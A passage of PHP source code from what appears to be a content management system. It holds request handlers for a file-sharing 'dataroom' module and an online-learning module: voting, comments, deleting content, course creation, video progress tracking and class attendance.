$values->idx, 'action' => 'VOTE', 'midx' => $this->IM->getModule('member')->getLogged(), 'result' => strtoupper($values->vote), 'reg_date' => time()))->execute(); $results->success = true; $results->message = $this->getLanguage('vote/' . $values->vote); $results->liveUpdate = 'liveUpdateDataroom' . ucfirst($values->type) . ucfirst($values->vote) . $values->idx; $results->liveValue = number_format($values->vote + 1); } else { $results->success = false; $results->message = $this->getLanguage('vote/duplicated'); $results->result = $check->result; } } } } if ($action == 'delete') { $values->idx = Request('idx'); $values->type = Request('type'); if ($values->type == 'post') { $post = $this->getPost($values->idx); if ($post == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($this->checkPermission('post_delete') == true || $post->midx == $this->IM->getModule('member')->getLogged()) { $results->success = true; } else { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } if ($results->success == true) { $this->db()->update($this->table->post, array('is_delete' => 'TRUE', 'FALSE'))->where('idx', $values->idx)->execute(); } $results->success = true; } elseif ($values->type == 'ment') { $ment = $this->getMent($values->idx); $post = $this->getPost($ment->parent); if ($ment == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($this->checkPermission('ment_delete') == true || $ment->midx == $this->IM->getModule('member')->getLogged()) { $results->success = true; } else { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } if ($results->success == true) { if ($this->checkMentTree($values->idx) == false) { $this->db()->delete($this->table->ment)->where('idx', $values->idx)->execute(); $this->db()->delete($this->table->ment_depth)->where('idx', $values->idx)->execute(); if ($ment->source != 0) { $source = $this->getMent($ment->source); while ($source->is_delete == 'TRUE') { if ($this->checkMentTree($source->idx) == false) { $this->db()->delete($this->table->ment)->where('idx', $source->idx)->execute(); $this->db()->delete($this->table->ment_depth)->where('idx', $source->idx)->execute(); if ($source->source != 0) { $source = $this->getMent($source->source); } else { break; } } else { break; } } } $results->position = null; } else { $results->position = $values->idx; $this->db()->update($this->table->ment, array('is_delete' => 'TRUE', 'modify_date' => time(), 'content' => '', 'search' => ''))->where('idx', $ment->idx)->execute(); } $attachments = $this->db()->select($this->table->attachment)->where('parent', $ment->idx)->where('type', 'MENT')->get(); for ($i = 0, $loop = count($attachments); $i < $loop; $i++) { $attachments[$i] = $attachments[$i]->idx; } $this->IM->getModule('attachment')->fileDelete($attachments); $lastMent = $this->db()->select($this->table->ment)->where('parent', $ment->parent)->where('is_delete', 'FALSE')->orderBy('reg_date', 'desc')->get(); if (count($lastMent) == 0) { $this->db()->update($this->table->post, array('ment' => 0, 'last_ment' => $post->reg_date))->where('idx', $ment->parent)->execute(); $results->parent = $ment->parent; } else { if ($results->position == null) { $position = $this->db()->select($this->table->ment_depth)->where('parent', $ment->parent)->where('head', $ment->head, '<=')->where('arrange', $ment->arrange, '<')->orderBy('head', 'asc')->orderBy('arrange', 'asc')->get(); $lastPosition = array_pop($position); $results->position = $lastPosition->idx; } $this->db()->update($this->table->post, array('ment' => count($lastMent), 'last_ment' => $lastMent[0]->reg_date))->where('idx', $ment->parent)->execute(); } $this->IM->deleteArticle('dataroom', 'ment', $values->idx); $results->message = $this->getLanguage('mentDelete/success'); } } elseif ($values->type == 'answer') { $answer = $this->db()->select($this->table->answer)->where('idx', $values->idx)->getOne(); if ($answer == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($this->checkPermission('answer_delete') == true || $answer->midx == $this->IM->getModule('member')->getLogged()) { $results->success = true; } else { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } if ($results->success == true) { $this->db()->delete($this->table->answer)->where('idx', $values->idx)->execute(); $attachments = $this->db()->select($this->table->attachment)->where('parent', $answer->idx)->where('type', 'ANSWER')->get(); for ($i = 0, $loop = count($attachments); $i < $loop; $i++) { $attachments[$i] = $attachments[$i]->idx; } $this->IM->getModule('attachment')->fileDelete($attachments); $this->db()->update($this->table->question, array('has_answer' => 'FALSE'))->where('idx', $answer->parent)->execute(); $results->parent = $answer->parent; $results->message = $this->getLanguage('answerDelete/success'); } } $results->type = $values->type; } $this->IM->fireEvent('afterDoProcess', 'dataroom', $action, $values, $results); return $results; }
function doProcess($action) { $results = new stdClass(); $values = new stdClass(); if ($action == 'listUrl') { $menu = Request('menu'); $page = Request('page'); $page = $this->IM->getPages($menu, $page); $oKey = Request('oKey'); $oKeyword = Request('oKeyword'); $oLabel = Request('oLabel'); $oSort = Request('oSort'); $oDirection = Request('oDirection'); $key = Request('key'); $keyword = Request('keyword'); $label = Request('label'); $sort = Request('sort'); $direction = Request('direction'); $key = Request('key'); $keyword = Request('keyword'); $p = Request('p') ? Request('p') : 1; $queryString = 'menu=' . $page->menu . '&page=' . $page->page . '&key=' . $key . '&keyword=' . $keyword . '&label=' . $label . '&sort=' . $sort . '&direction=' . $direction . '&p=' . $p; if ($oKey != $key || $oKeyword != $keyword || $oLabel != $label || $oSort != $sort || $oDirection != $direction) { $p = 1; } $default = array(); if (strlen($keyword) == 0) { $default['key'] = ''; $default['keyword'] = ''; } if ($sort == 'idx' && $direction == 'desc') { $default['sort'] = $default['direction'] = ''; } if (isset($page->context->config->label) == true && $page->context->config->label == $label) { $default['label'] = ''; } if (isset($page->context->config->category) == true && $page->context->config->category == $category) { $default['category'] = ''; } $url = $this->IM->getUrl($page->menu, $page->page, 'list', $p) . $this->IM->getQueryString($default, $queryString); $results->success = true; $results->url = $url; } if ($action == 'create') { $values->errors = array(); $values->idx = Request('idx'); $values->lid = Request('lid'); $values->menu = Request('menu'); $values->page = Request('page'); $values->title = Request('title') ? Request('title') : ($values->errors['title'] = $this->getLanguage('create/help/title/error')); $values->content = Request('content') ? Request('content') : ($values->errors['content'] = $this->getLanguage('create/help/content/error')); $values->type = Request('type') ? Request('type') : ($values->errors['type'] = $this->getLanguage('create/help/type/error')); $values->attend = Request('attend') ? Request('attend') : ($values->errors['attend'] = $this->getLanguage('create/help/attend/error')); $values->lms = $this->getLms($values->lid); if ($values->lms->use_label != 'NONE') { $values->labels = is_array(Request('labels')) == true ? Request('labels') : array(); if ($values->lms->use_label == 'FORCE' && count($values->labels) == 0) { $values->errors['labels'] = $this->getLanguage('create/help/labels/error'); } } else { $values->labels = array(); } if ($this->IM->getModule('member')->isLogged() == false) { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } elseif (empty($values->errors) == true) { $results->success = true; $mHash = new Hash(); $insert = array(); $insert['lid'] = $values->lid; $insert['title'] = $values->title; $insert['content'] = $values->content; if ($values->idx == null) { $class = null; $reg_date = time(); $insert['midx'] = $this->IM->getModule('member')->getLogged(); $insert['reg_date'] = $reg_date; $insert['last_subject'] = $reg_date; $insert['ip'] = $_SERVER['REMOTE_ADDR']; $values->idx = $this->db()->insert($this->table->class, $insert)->execute(); // $this->IM->getModule('member')->sendPoint(null,$values->forum->post_point,'forum','post',array('idx'=>$values->idx)); // $this->IM->getModule('member')->addActivity(null,$values->forum->post_exp,'forum','post',array('idx'=>$values->idx)); } else { $class = $this->getClass($values->idx); $reg_date = $class->last_subject; if ($this->checkPermission('class_modify') == false && $class->midx != $this->IM->getModule('member')->getLogged()) { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } if ($results->success == true) { $this->db()->update($this->table->class, $insert)->where('idx', $class->idx)->execute(); /* if ($post->midx != $this->IM->getModule('member')->getLogged()) { $this->IM->getModule('push')->sendPush($post->midx,'forum','post_modify',$values->idx,array('from'=>$this->IM->getModule('member')->getLogged())); } $this->IM->getModule('member')->addActivity(null,0,'forum','post_modify',array('idx'=>$values->idx)); */ } } if ($results->success == true) { $cover = Request('cover'); if ($cover && preg_match('/^data:image/', $cover) == true) { $temp = explode(',', $cover); $type = array_shift($temp); $fileType = 'jpg'; if (preg_match('/^data:image\\/(.*?);/', $type, $match) == true) { $fileType = $match[1]; } $imageData = base64_decode(implode(',', $temp)); $tempFileName = $this->IM->getModule('attachment')->getTempPath(true) . '/' . md5($imageData); file_put_contents($tempFileName, $imageData); if ($this->IM->getModule('attachment')->createThumbnail($tempFileName, $tempFileName, 420, 560, false) == true) { if ($class == null || $class->cover == 0) { $coverIdx = $this->IM->getModule('attachment')->fileSave('cover.' . $fileType, $tempFileName, 'lms', 'cover'); } else { $coverIdx = $this->IM->getModule('attachment')->fileReplace($class->cover, 'cover.' . $fileType, $tempFileName); } $this->db()->update($this->table->class, array('cover' => $coverIdx))->where('idx', $values->idx)->execute(); } } $labels = $this->db()->select($this->table->class_label)->where('idx', $values->idx)->get(); for ($i = 0, $loop = count($labels); $i < $loop; $i++) { if (in_array($labels[$i]->label, $values->labels) == false) { $this->db()->delete($this->table->class_label)->where('idx', $values->idx)->where('label', $labels[$i]->label)->execute(); $lastClass = $this->db()->select($this->table->class_label)->where('label', $labels[$i]->label)->orderBy('reg_date', 'desc')->get(); $classnum = count($lastClass); $lastClassTime = $classnum > 0 ? $lastClass[0]->reg_date : 0; $this->db()->update($this->table->label, array('classnum' => $classnum, 'last_class' => $lastClassTime))->where('idx', $labels[$i]->label)->execute(); } } if (count($values->labels) > 0) { for ($i = 0, $loop = count($values->labels); $i < $loop; $i++) { if ($this->db()->select($this->table->class_label)->where('idx', $values->idx)->where('label', $values->labels[$i])->count() == 0) { $this->db()->insert($this->table->class_label, array('idx' => $values->idx, 'label' => $values->labels[$i], 'reg_date' => $reg_date))->execute(); $lastClass = $this->db()->select($this->table->class_label)->where('label', $values->labels[$i])->orderBy('reg_date', 'desc')->get(); $classnum = count($lastClass); $lastClassTime = $classnum > 0 ? $lastClass[0]->reg_date : 0; $this->db()->update($this->table->label, array('classnum' => $classnum, 'last_class' => $lastClassTime))->where('idx', $values->labels[$i])->execute(); } } } $lastClass = $this->db()->select($this->table->class)->where('lid', $values->lid)->orderBy('last_subject', 'desc')->get(); $classnum = count($lastClass); $lastClassTime = $classnum > 0 ? $lastClass[0]->last_subject : 0; $this->db()->update($this->table->lms, array('classnum' => $classnum, 'last_class' => $lastClassTime))->where('lid', $values->lid)->execute(); $page = $this->IM->getPages($values->menu, $values->page); if ($page->context->config == null) { $results->redirect = $this->IM->getUrl($values->menu, $values->page, 'class', $values->idx); } elseif (in_array($page->context->config->label, $values->labels) == true) { $results->redirect = $this->IM->getUrl($values->menu, $values->page, 'class', $values->idx); } else { $redirectPage = $this->getPostPage($values->idx); $results->redirect = $this->IM->getUrl($redirectPage->menu, $redirectPage->page, 'class', $values->idx); } } } else { $results->success = false; $results->message = $this->getLanguage('error/required'); $results->errors = $values->errors; } } if ($action == 'postSubject') { $values->type = Request('type'); $values->parent = Request('parent'); $class = $this->getClass($values->parent); if ($values->type == 'add' || $values->type == 'modify') { if ($class == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($this->IM->getModule('member')->isLogged() == false) { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } elseif ($this->checkPermission('add_subject') == true || $class->midx == $this->IM->getModule('member')->getLogged()) { $results->success = true; $results->modalHtml = $this->getPostSubjectModal($values->parent); } else { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } } else { $values->errors = array(); $values->title = Request('title') ? Request('title') : ($values->errors['title'] = $this->getLanguage('addSubject/help/title/error')); if ($class == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($this->IM->getModule('member')->isLogged() == false) { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } elseif (count($values->errors) == 0) { $results->success = true; $sort = $this->db()->select($this->table->subject)->where('parent', $values->parent)->orderBy('sort', 'desc')->getOne(); $sort = $sort == null ? 0 : $sort->sort + 1; $this->db()->insert($this->table->subject, array('lid' => $class->lid, 'parent' => $values->parent, 'midx' => $this->IM->getModule('member')->getLogged(), 'title' => $values->title, 'reg_date' => time(), 'sort' => $sort))->execute(); $lastSubject = $this->db()->select($this->table->subject)->where('parent', $values->parent)->orderBy('reg_date', 'desc')->get(); $subject = count($lastSubject); $lastSubjectTime = $subject > 0 ? $lastSubject[0]->reg_date : 0; $this->db()->update($this->table->class, array('last_subject' => $lastSubjectTime, 'subject' => $subject))->where('idx', $values->parent)->execute(); } else { $results->success = false; $results->message = $this->getLanguage('error/required'); $results->errors = $values->errors; } } } if ($action == 'getConfig') { $values->type = Request('type'); $values->idx = Request('idx'); if ($values->type == 'post') { $post = $this->getPost($values->idx); $class = $this->getClass($post->class); } else { $subject = $this->getSubject($values->idx); $class = $this->getClass($subject->parent); } if ($class->midx == $this->IM->getModule('member')->getLogged()) { $results->success = true; if ($values->type == 'post') { $results->posts = array(); $posts = $this->db()->select($this->table->post)->where('parent', $post->parent)->orderBy('sort', 'asc')->get(); for ($i = 0, $loop = count($posts); $i < $loop; $i++) { if ($posts[$i]->idx == $values->idx) { continue; } $results->posts[] = array('idx' => $posts[$i]->idx, 'title' => $posts[$i]->title); } } $results->subjects = array(); $subjects = $this->db()->select($this->table->subject)->where('parent', $class->idx)->orderBy('sort', 'asc')->get(); for ($i = 0, $loop = count($subjects); $i < $loop; $i++) { if ($values->type == 'post' && $post->parent == $subjects[$i]->idx) { continue; } $results->subjects[] = array('idx' => $subjects[$i]->idx, 'title' => $subjects[$i]->title); } } else { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } } if ($action == 'getPostContext') { $values->idx = Request('idx'); $values->post = $this->getPost($values->idx); $values->attend = $this->getAttend($values->post->class); if ($values->post != null) { $results->success = true; $results->context = json_decode($values->post->context); if ($values->attend->mode == "P") { $trackings = $this->db()->select($this->table->tracking)->where('pidx', $values->idx)->get(); $results->tracking = new stdClass(); $results->tracking->last_position = 0; $results->tracking->tracking = array(); for ($i = 0; $i < $results->context->time; $i++) { $results->tracking->tracking[$i] = 0; } foreach ($trackings as $tracking) { for ($i = 0; $i < $results->context->time; $i++) { $count = base_convert(substr($tracking->tracking, $i, 1), 32, 10); $results->tracking->tracking[$i] += $count; } } } else { $results->tracking = $this->db()->select($this->table->tracking)->where('midx', $this->IM->getModule('member')->getLogged())->where('pidx', $values->idx)->getOne(); if ($results->tracking == null) { $results->tracking = new stdClass(); $results->tracking->last_position = 0; $results->tracking->type = $values->post->type; if ($values->post->type == 'youtube' || $values->post->type == 'video') { $results->tracking->tracking = 'T' . str_pad('', $results->context->time, '0'); } } else { if ($values->post->type == 'youtube' || $values->post->type == 'video') { $results->tracking->tracking = 'T' . $results->tracking->tracking; } } } } else { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } } if ($action == 'tracking') { $values->pidx = Request('pidx'); $values->post = $this->getPost($values->pidx); $values->midx = $this->IM->getModule('member')->getLogged(); $values->last_position = Request('last_position'); if ($values->post->type == 'youtube') { $context = json_decode($values->post->context); $values->tracking = substr(Request('tracking'), 1); if (strlen($values->tracking) != $context->time) { $values->tracking = str_pad(substr($values->tracking, 0, $context->time), $context->time, STR_PAD_RIGHT); } $values->percent = round(($context->time - substr_count($values->tracking, '0')) / $context->time * 100); } if ($this->db()->select($this->table->tracking)->where('midx', $values->midx)->where('pidx', $values->pidx)->count() == 0) { $this->db()->insert($this->table->tracking, array('midx' => $values->midx, 'pidx' => $values->pidx, 'tracking' => $values->tracking, 'percent' => $values->percent, 'last_position' => $values->last_position, 'reg_date' => time(), 'update_date' => time()))->execute(); } else { $this->db()->update($this->table->tracking, array('tracking' => $values->tracking, 'percent' => $values->percent, 'last_position' => $values->last_position, 'update_date' => time()))->where('midx', $values->midx)->where('pidx', $values->pidx)->execute(); } $results->success = true; } if ($action == 'addItem') { $values->parent = Request('parent'); $subject = $this->getSubject($values->parent); if ($subject == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($this->IM->getModule('member')->isLogged() == false) { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } elseif ($this->checkPermission('add_item') == true || $subject->midx == $this->IM->getModule('member')->getLogged()) { $results->success = true; $results->modalHtml = $this->getAddItemModal($values->parent); } else { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } } if ($action == 'postWrite') { $values->errors = array(); $values->lid = Request('lid'); $values->idx = Request('idx'); $values->parent = Request('parent'); $values->subject = $this->getSubject($values->parent); $values->lms = $this->getLms($values->lid); $values->type = Request('type'); $values->menu = Request('menu'); $values->page = Request('page'); $values->title = Request('title') ? Request('title') : ($values->errors['title'] = $this->getLanguage('postWrite/help/title/error')); $values->content = Request('content') ? Request('content') : ($values->errors['content'] = $this->getLanguage('postWrite/help/content/error')); $values->context = new stdClass(); $values->progress_check = Request('progress_check') ? 'TRUE' : 'FALSE'; $values->attachments = is_array(Request('attachments')) == true ? Request('attachments') : array(); for ($i = 0, $loop = count($values->attachments); $i < $loop; $i++) { $values->attachments[$i] = Decoder($values->attachments[$i]); } $values->content = $this->encodeContent($values->content, $values->attachments); if ($values->type == 'youtube') { $values->context->id = Request('id') ? Request('id') : ($values->errors['url'] = $this->getLanguage('youtube/help/url/error')); $values->context->thumbnail = Request('thumbnail'); $values->context->afk_check = Request('afk_check') ? true : false; if ($values->context->afk_check == true) { $values->context->afk_check_time = preg_match('/^[1-9]+[0-9]*$/', Request('afk_check_time')) == true && Request('afk_check_time') >= 60 ? Request('afk_check_time') : ($values->errors['afk_check_time'] = $this->getLanguage('youtube/help/afk_check_time/error')); } else { $values->context->afk_check_time = 0; } if (preg_match('/^PT(([0-9]+)H)?(([0-9]+)M)?(([0-9]+)S)?$/', Request('time'), $time) == true) { $values->context->time = $time[2] * 3600 + $time[4] * 60 + $time[6]; } else { $values->context->time = -1; } $values->context->caption = Request('caption') == "true"; } if ($values->type == 'video') { $values->context->id = Request('id') ? Request('id') : ($values->errors['file'] = $this->getLanguage('video/help/file/error')); $values->context->privacy = Request('privacy'); $values->context->afk_check = Request('afk_check') ? true : false; if ($values->context->afk_check == true) { $values->context->afk_check_time = preg_match('/^[1-9]+[0-9]*$/', Request('afk_check_time')) == true && Request('afk_check_time') >= 60 ? Request('afk_check_time') : ($values->errors['afk_check_time'] = $this->getLanguage('youtube/help/afk_check_time/error')); } else { $values->context->afk_check_time = 0; } } $values->context = json_encode($values->context); if ($this->IM->getModule('member')->isLogged() == false) { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } elseif (empty($values->errors) == true) { $results->success = true; $mHash = new Hash(); $insert = array(); $insert['lid'] = $values->lid; $insert['class'] = $values->subject->parent; $insert['parent'] = $values->parent; $insert['type'] = $values->type; $insert['title'] = $values->title; $insert['content'] = $values->content; $insert['search'] = GetString($values->content, 'index'); $insert['context'] = $values->context; $insert['progress_check'] = $values->progress_check; $insert['reg_date'] = time(); if ($values->idx == null) { $post = null; $sort = $this->db()->select($this->table->post)->where('parent', $values->parent)->orderBy('sort', 'desc')->getOne(); $sort = $sort == null ? 0 : $sort->sort + 1; $insert['sort'] = $sort; $insert['midx'] = $this->IM->getModule('member')->getLogged(); $values->idx = $this->db()->insert($this->table->post, $insert)->execute(); // $this->IM->getModule('member')->sendPoint(null,$values->forum->post_point,'forum','post',array('idx'=>$values->idx)); // $this->IM->getModule('member')->addActivity(null,$values->forum->post_exp,'forum','post',array('idx'=>$values->idx)); } else { $post = $this->getPost($values->idx); $reg_date = $post->last_ment; if ($this->checkPermission('post_modify') == false && $post->midx != $this->IM->getModule('member')->getLogged()) { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } if ($results->success == true) { $this->db()->update($this->table->post, $insert)->where('idx', $post->idx)->execute(); if ($post->midx != $this->IM->getModule('member')->getLogged()) { $this->IM->getModule('push')->sendPush($post->midx, 'forum', 'post_modify', $values->idx, array('from' => $this->IM->getModule('member')->getLogged())); } $this->IM->getModule('member')->addActivity(null, 0, 'forum', 'post_modify', array('idx' => $values->idx)); } } if ($results->success == true) { for ($i = 0, $loop = count($values->attachments); $i < $loop; $i++) { if ($this->db()->select($this->table->attachment)->where('idx', $values->attachments[$i])->count() == 0) { $this->db()->insert($this->table->attachment, array('idx' => $values->attachments[$i], 'lid' => $values->lid, 'type' => 'POST', 'parent' => $values->idx))->execute(); } } $results->redirect = $this->IM->getUrl($values->menu, $values->page, 'class', $values->subject->parent); } } else { $results->success = false; $results->message = $this->getLanguage('error/required'); $results->errors = $values->errors; } } if ($action == 'postView') { $values->idx = Request('idx'); $values->post = $this->getPost($values->idx); $attend = $this->getAttend($values->post->class); if ($this->IM->getModule('member')->isLogged() == false) { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } else { if ($attend == null) { $results->success = true; $results->modalHtml = $this->getAttendClassModal($values->post->class, $values->idx); } else { if ($attend->status == 'ACTIVE') { $page = $this->getClassPage($values->post->class); $results->success = true; $results->redirect = $this->IM->getUrl($page->menu, $page->page, 'view', $values->idx); } else { $results->success = false; // To Do : Message } } } } if ($action == 'postModify') { $values->idx = Request('idx'); $post = $this->getPost($values->idx); if ($post == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($this->checkPermission('post_modify') == true || $post->midx == $this->IM->getModule('member')->getLogged()) { $results->success = true; $results->permission = true; } else { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } } if ($action == 'postDelete') { $values->idx = Request('idx'); $post = $this->getPost($values->idx); if ($post == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($this->checkPermission('post_delete') == true || $post->midx == $this->IM->getModule('member')->getLogged()) { $results->success = true; $results->modalHtml = $this->getDelete('post', $values->idx); } else { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } } if ($action == 'attendClass') { $values->idx = Request('idx'); $values->class = $this->getClass($values->idx); $values->post = Request('post'); $attend = $this->getAttend($values->class->idx); if ($this->IM->getModule('member')->isLogged() == false) { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } else { if ($attend == null) { $results->success = true; $status = 'ACTIVE'; $this->db()->insert($this->table->attend, array('midx' => $this->IM->getModule('member')->getLogged(), 'class' => $values->class->idx, 'reg_date' => time(), 'status' => $status))->execute(); $student = $this->db()->select($this->table->attend)->where('class', $values->class->idx)->where('status', 'ACTIVE')->count(); $this->db()->update($this->table->class, array('student' => $student))->where('idx', $values->class->idx)->execute(); if ($values->post != null) { $results->post = $values->post; } else { $page = $this->getClassPage($values->idx); $results->redirect = $this->IM->getUrl($page->menu, $page->page, 'class', $values->idx); } } else { if ($attend->mode == 'P') { $results->success = false; $results->message = $this->getLanguage('error/attendMyClass'); } else { $results->success = false; // $results->message = $this->getLanguage('error/attendMyClass'); } } } } if ($action == 'mentWrite') { $values->errors = array(); $values->idx = Request('idx'); $values->fromidx = Request('fromidx') ? Request('fromidx') : 0; $values->parent = Request('parent'); $values->post = $this->getPost($values->parent); $values->lms = $this->getLms($values->post->lid); $values->content = Request('content') ? Request('content') : ($values->errors['content'] = $this->getLanguage('mentWrite/help/content/error')); $values->position = is_numeric(Request('position')) == true ? Request('position') : 0; $results->success = true; if ($this->IM->getModule('member')->isLogged() == false) { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } elseif ($results->success == true && empty($values->errors) == true) { $mHash = new Hash(); $insert = array(); $insert['lid'] = $values->post->lid; $insert['parent'] = $values->parent; $insert['fromidx'] = $values->fromidx; $insert['midx'] = $this->IM->getModule('member')->getLogged(); $insert['content'] = $values->content; $insert['position'] = $values->position; if ($values->idx == null) { $insert['reg_date'] = time(); $insert['ip'] = $_SERVER['REMOTE_ADDR']; $values->idx = $this->db()->insert($this->table->ment, $insert)->execute(); if ($values->post->midx != $this->IM->getModule('member')->getLogged()) { // $this->IM->getModule('push')->sendPush($values->post->midx,'forum','ment',$values->post->idx,array('idx'=>$values->idx,'from'=>$this->IM->getModule('member')->getLogged())); } // if ($source != 0 && $sourceData->midx != $this->IM->getModule('member')->getLogged()) { // $this->IM->getModule('push')->sendPush($sourceData->midx,'forum','replyment',$values->post->idx,array('idx'=>$values->idx,'from'=>$this->IM->getModule('member')->getLogged())); // } // $this->IM->getModule('member')->sendPoint(null,$values->forum->ment_point,'forum','ment',array('idx'=>$values->idx)); // $this->IM->getModule('member')->addActivity(null,$values->forum->ment_exp,'forum','ment',array('idx'=>$values->idx)); } else { /* $ment = $this->getMent($values->idx); if ($this->checkPermission('ment_modify') == false && ($ment->midx != 0 && $ment->midx != $this->IM->getModule('member')->getLogged())) { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } elseif ($ment->midx == 0) { if ($mHash->password_validate($values->password,$ment->password) == false) { $results->success = false; $results->errors = array('password'=>$this->getLanguage('error/incorrectPassword')); $results->message = $this->getLanguage('error/incorrectPassword'); } } if ($results->success == true) { if ($this->IM->getModule('member')->isLogged() == false) { $insert['name'] = $values->name; $insert['password'] = $values->password ? $mHash->password_hash($values->password) : ''; $insert['email'] = $values->email; $insert['ip'] = $_SERVER['REMOTE_ADDR']; } $insert['modify_date'] = time(); $this->db()->update($this->table->ment,$insert)->where('idx',$ment->idx)->execute(); if ($ment->midx != $this->IM->getModule('member')->getLogged()) { $this->IM->getModule('push')->sendPush($ment->midx,'forum','ment_modify',$values->idx,array('from'=>$this->IM->getModule('member')->getLogged())); } $this->IM->getModule('member')->addActivity(null,0,'forum','ment',array('idx'=>$values->idx)); } */ } if ($results->success == true) { $lastMent = $this->db()->select($this->table->ment)->where('parent', $values->parent)->where('is_delete', 'FALSE')->orderBy('reg_date', 'desc')->get(); $mentnum = count($lastMent); $lastMentTime = $mentnum > 0 ? $lastMent[0]->reg_date : $values->post->reg_date; $this->db()->update($this->table->post, array('ment' => $mentnum, 'last_ment' => $lastMentTime))->where('idx', $values->parent)->execute(); // $this->IM->setArticle('forum',$values->post->lid,'post',$values->parent,time()); // $this->IM->setArticle('forum',$values->post->lid,'ment',$values->idx,time()); $results->message = $this->getLanguage('mentWrite/success'); $results->idx = $values->idx; $results->parent = $values->parent; } } elseif (count($values->errors) > 0) { $results->success = false; $results->message = $this->getLanguage('error/required'); $results->errors = $values->errors; } } if ($action == 'mentModify') { $values->idx = Request('idx'); $ment = $this->getMent($values->idx); if ($ment == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($this->checkPermission('ment_modify') == true || $ment->midx == $this->IM->getModule('member')->getLogged()) { $results->success = true; } else { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } if ($results->success == true) { $ment->content = $this->getArticleContent($ment->content); $attachments = $this->db()->select($this->table->attachment)->where('parent', $ment->idx)->where('type', 'MENT')->get(); for ($i = 0, $loop = count($attachments); $i < $loop; $i++) { $attachments[$i] = $attachments[$i]->idx; } $ment->attachment = Encoder(json_encode($attachments)); $results->data = $ment; } } if ($action == 'vote') { $values->idx = Request('idx'); $values->vote = in_array(Request('vote'), array('good', 'bad')) == true ? Request('vote') : 'good'; if ($this->IM->getModule('member')->isLogged() == false) { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } else { $values->post = $this->getPost($values->idx); if ($values->post == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($values->post->midx == $this->IM->getModule('member')->getLogged()) { $results->success = false; $results->message = $this->getLanguage('vote/mypost'); } else { $values->forum = $this->getLms($values->post->lid); $check = $this->db()->select($this->table->history)->where('parent', $values->idx)->where('action', 'VOTE')->where('midx', $this->IM->getModule('member')->getLogged())->getOne(); if ($check == null) { if ($values->vote == 'good') { $this->db()->update($this->table->post, array('vote' => $this->db()->inc()))->where('idx', $values->idx)->execute(); } else { $this->db()->update($this->table->post, array('vote' => $this->db()->dec()))->where('idx', $values->idx)->execute(); } $this->db()->insert($this->table->history, array('type' => 'POST', 'parent' => $values->idx, 'action' => 'VOTE', 'midx' => $this->IM->getModule('member')->getLogged(), 'result' => strtoupper($values->vote), 'reg_date' => time()))->execute(); $results->success = true; $results->message = $this->getLanguage('vote/' . $values->vote); $results->liveUpdate = 'liveUpdateLmsVote' . $values->idx; $results->liveValue = number_format($values->vote == 'good' ? $values->post->vote + 1 : $values->post->vote - 1); $this->IM->getModule('member')->sendPoint(null, $values->forum->vote_point, 'forum', 'post_' . $values->vote, array('idx' => $values->idx)); $this->IM->getModule('member')->addActivity(null, $values->forum->vote_exp, 'forum', 'post_' . $values->vote, array('idx' => $values->idx)); $this->IM->getModule('push')->sendPush($values->post->midx, 'forum', 'post_' . $values->vote, $values->post->idx, array('from' => $this->IM->getModule('member')->getLogged())); } else { $results->success = false; $results->message = $this->getLanguage('vote/duplicated'); $results->result = $check->result; } } } } if ($action == 'getMent') { $values->parent = Request('parent'); $ments = $this->db()->select($this->table->ment)->where('parent', $values->parent)->get(); for ($i = 0, $loop = count($ments); $i < $loop; $i++) { $member = $this->IM->getModule('member')->getMember($ments[$i]->midx); $ments[$i]->nickname = $member->nickname; $ments[$i]->photo = $member->photo; } $results->success = true; $results->ments = $ments; } if ($action == 'getMentStatus') { $values->parent = Request('parent'); $status = array(); for ($i = 0; $i < 20; $i++) { $status[$i] = array('total' => 0); } $ments = $this->db()->select($this->table->ment)->where('parent', $values->parent)->get(); for ($i = 0, $loop = count($ments); $i < $loop; $i++) { $position = floor($ments[$i]->position / 5); $position = $position == 20 ? 19 : $position; $status[$position]['total']++; if (isset($status[$position][$ments[$i]->type]) == true) { $status[$position][$ments[$i]->type]++; } else { $status[$position][$ments[$i]->type] = 1; } } $results->success = true; $results->status = $status; } if ($action == 'mentDelete') { $values->idx = Request('idx'); $ment = $this->getMent($values->idx); if ($ment == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($this->checkPermission('ment_delete') == true || $ment->midx == $this->IM->getModule('member')->getLogged()) { $results->success = true; $results->modalHtml = $this->getDelete('ment', $values->idx); } else { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } } if ($action == 'delete') { $values->idx = Request('idx'); $values->type = Request('type'); if ($values->type == 'post') { $post = $this->getPost($values->idx); $values->forum = $this->getLms($post->lid); if ($post == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($this->checkPermission('post_delete') == true || $post->midx == $this->IM->getModule('member')->getLogged()) { $results->success = true; } else { $results->success = false; 